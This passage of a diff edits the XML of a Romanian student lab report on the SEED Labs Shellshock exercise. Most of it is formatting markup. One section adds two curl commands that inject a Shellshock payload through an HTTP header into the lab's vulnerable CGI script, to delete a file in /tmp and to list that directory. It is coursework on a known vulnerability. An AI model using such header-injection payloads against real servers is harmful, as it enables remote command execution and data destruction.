         <w:t>/tmp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="0"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:ind w:left="720" w:hanging="0"/>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="x-none" w:eastAsia="x-none"/>
+        </w:rPr>
       </w:r>
     </w:p>
     <w:p>
@@ -3092,7 +4700,7 @@
       </w:r>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId24"/>
+      <w:headerReference w:type="default" r:id="rId28"/>
       <w:type w:val="nextPage"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:left="1440" w:right="1440" w:header="720" w:top="777" w:footer="0" w:bottom="1440" w:gutter="0"/>
@@ -3979,6 +5587,143 @@
   <w:abstractNum w:abstractNumId="7">
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1080"/>
+        </w:tabs>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1440"/>
+        </w:tabs>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2160"/>
+        </w:tabs>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2880"/>
+        </w:tabs>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:cs="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="◦"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="▪"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3600"/>
+        </w:tabs>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="OpenSymbol" w:hAnsi="OpenSymbol" w:cs="OpenSymbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="8">
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
       <w:numFmt w:val="none"/>
       <w:suff w:val="nothing"/>
       <w:lvlText w:val=""/>
@@ -4115,6 +5860,9 @@
   </w:num>
   <w:num w:numId="7">
     <w:abstractNumId w:val="7"/>
+  </w:num>
+  <w:num w:numId="8">
+    <w:abstractNumId w:val="8"/>
   </w:num>
 </w:numbering>
 </file>

--- a/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
+++ b/L07/Birlutiu_Claudiu_L07/SablonRaportL07.docx
@@ -3982,156 +3982,71 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr/>
+        <w:t>Sarcina 3.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t>D</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr/>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ștergerea fișierului din </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:lang w:val="ro-RO"/>
+        </w:rPr>
+        <w:t>/tmp</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:lang w:val="x-none" w:eastAsia="x-none"/>
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
         <w:rPr>
           <w:lang w:val="x-none" w:eastAsia="x-none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
         <w:rPr>
           <w:lang w:val="x-none" w:eastAsia="x-none"/>
         </w:rPr>
       </w:pPr>
       <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
+        <w:rPr>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
           <w:lang w:val="x-none" w:eastAsia="x-none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:lang w:val="x-none" w:eastAsia="x-none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
+        <w:t xml:space="preserve">Pentru stergere fisierului voi face o abordare similara celei prezentate la punctul anterior </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4139,20 +4054,256 @@
         <w:pStyle w:val="Normal"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
-          <w:numId w:val="7"/>
+          <w:numId w:val="8"/>
         </w:numPr>
-        <w:rPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
           <w:lang w:val="x-none" w:eastAsia="x-none"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+        <w:t>stergere</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
           <w:b w:val="false"/>
           <w:bCs w:val="false"/>
           <w:lang w:val="x-none" w:eastAsia="x-none"/>
         </w:rPr>
-        <w:t xml:space="preserve">Pentru a verifica continutul folderului /tmp vom lansa un alt atac ce se va </w:t>
+        <w:t xml:space="preserve">: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>curl -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>H</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "BIRLUTIUSTERGERE: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>() { echo salut;}; echo Content_type: text/plain; echo;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /bin/rm</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> /tmp/BirlutiuAtac.txt</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve">" -v </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId28">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:i w:val="false"/>
+            <w:iCs w:val="false"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>http://www.seedlab-shellshock.com/cgi-bin/</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:i w:val="false"/>
+            <w:iCs w:val="false"/>
+            <w:sz w:val="22"/>
+            <w:szCs w:val="22"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>vul</w:t>
+        </w:r>
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="InternetLink"/>
+            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+            <w:b w:val="false"/>
+            <w:bCs w:val="false"/>
+            <w:i w:val="false"/>
+            <w:iCs w:val="false"/>
+            <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+          </w:rPr>
+          <w:t>.cgi</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Normal"/>
+        <w:numPr>
+          <w:ilvl w:val="1"/>
+          <w:numId w:val="8"/>
+        </w:numPr>
+        <w:spacing w:before="0" w:after="0"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>afisare</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>: curl -</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>H</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> "BIRLUTIUAFISARE: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>() { echo salut;}; echo Content_type: text/plain; echo; /bin/ls -l /tmp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>" -v http://www.seedlab-shellshock.com/cgi-bin/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="22"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>vul</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:lang w:val="ro-RO" w:eastAsia="x-none"/>
+        </w:rPr>
+        <w:t>.cgi</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -4179,303 +4330,51 @@
         <w:rPr>
           <w:lang w:val="x-none" w:eastAsia="x-none"/>
         </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Inconsolata" w:hAnsi="Inconsolata"/>
-          <w:b w:val="false"/>
-          <w:b w:val="false"/>
-          <w:bCs w:val="false"/>
-          <w:lang w:val="ro-RO"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr/>
